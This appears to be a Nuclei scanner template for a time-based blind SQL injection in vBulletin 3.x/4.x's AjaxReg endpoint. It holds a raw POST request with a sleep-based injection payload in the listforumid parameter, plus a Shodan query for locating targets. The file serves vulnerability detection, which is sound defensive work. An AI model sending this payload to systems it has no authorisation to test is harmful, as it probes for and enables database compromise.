43 lines
1.5 KiB
YAML
43 lines
1.5 KiB
YAML
id: vbulletin-ajaxreg-sqli
|
|
|
|
info:
|
|
name: vBulletin 3.x / 4.x AjaxReg - SQL Injection
|
|
author: mastercho
|
|
severity: critical
|
|
description: |
|
|
vBulletin versions 3.x and 4.x suffer from an AjaxReg remote blind SQL injection vulnerability.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/118703/vBulletin-3.x-4.x-AjaxReg-SQL-Injection.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cwe-id: CWE-89
|
|
cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.component:"vBulletin"
|
|
product: vbulletin
|
|
vendor: vbulletin
|
|
tags: time-based-sqli,packetstorm,vbulletin,ajaxreg,sqli
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 20s
|
|
POST /ajax.php?do=inforum&listforumid=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&result=10 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
undefined&s=&securitytoken=guest
|
|
|
|
host-redirects: true
|
|
max-redirects: 3
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 200'
|
|
- 'contains_any(header, "bb_lastvisit", "bb_sessionhash")'
|
|
condition: and
|
|
# digest: 4a0a00473045022100e1ad65c3271c81447400f176aa982cf5b8e8671ab1e4154a01475a70de3b7fd50220111c7a08222441aee54b9a1785c4ceb768d7f00f3879c525ff057ee9b2103195:922c64590222798bb761d5b6d8e72950 |